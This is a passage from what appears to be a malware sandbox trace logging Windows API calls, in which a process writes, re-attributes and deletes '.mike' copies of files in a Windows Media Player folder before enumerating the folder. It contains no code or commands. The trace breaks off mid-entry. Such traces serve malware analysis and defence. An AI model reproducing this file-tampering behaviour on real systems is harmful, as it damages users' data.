lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", dwFileAttributes=0x80) returned 0 [0100.902] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png", lpFilePart=0x0) returned 0x40 [0100.902] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike", lpFilePart=0x0) returned 0x45 [0100.903] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png.mike")) returned 1 [0100.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpFilePart=0x0) returned 0x3f [0100.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.907] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.908] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpFilePart=0x0) returned 0x3f [0100.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.909] WriteFile (in: hFile=0x288, lpBuffer=0x2260afc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2260afc*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.910] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.922] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.922] WriteFile (in: hFile=0x288, lpBuffer=0x2266770*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2266770*, lpNumberOfBytesWritten=0x2af104*=0x4d0, lpOverlapped=0x0) returned 1 [0100.923] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.924] WriteFile (in: hFile=0x288, lpBuffer=0x2269988*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2269988*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", dwFileAttributes=0x80) returned 0 [0100.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpFilePart=0x0) returned 0x3f [0100.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpFilePart=0x0) returned 0x3f [0100.927] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike", lpFilePart=0x0) returned 0x44 [0100.927] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.jpg.mike")) returned 1 [0100.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.930] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0100.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.930] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.931] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", lpFilePart=0x0) returned 0x3f [0100.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.932] WriteFile (in: hFile=0x288, lpBuffer=0x226e718*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x226e718*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.934] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.938] WriteFile (in: hFile=0x288, lpBuffer=0x227acdc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x227acdc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.939] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", dwFileAttributes=0x80) returned 0 [0100.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", lpFilePart=0x0) returned 0x3f [0100.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.941] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike", lpFilePart=0x0) returned 0x44 [0100.941] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.png.mike")) returned 1 [0100.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.943] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpFilePart=0x0) returned 0x49 [0100.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpFilePart=0x0) returned 0x49 [0100.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.946] WriteFile (in: hFile=0x288, lpBuffer=0x227f634*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x227f634*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.947] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.951] WriteFile (in: hFile=0x288, lpBuffer=0x228ed90*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x228ed90*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", dwFileAttributes=0x80) returned 0 [0100.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpFilePart=0x0) returned 0x49 [0100.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike", lpFilePart=0x0) returned 0x4e [0100.954] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml.mike")) returned 1 [0100.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0100.955] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5755980, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x577bae0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0100.955] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5755980, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x577bae0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.955] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8adeec5d, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtransport.xml", cAlternateFileName="")) returned 1 [0100.956] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b1f3147, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="connectionmanager_dmr.xml", cAlternateFileName="")) returned 1 [0100.956] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.jpg", cAlternateFileName="")) returned 1 [0100.956] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828ce928, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828ce928, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.png", cAlternateFileName="")) returned 1 [0100.956] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828a87cb, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828a87cb, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.jpg", cAlternateFileName="")) returned 1 [0100.956] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, 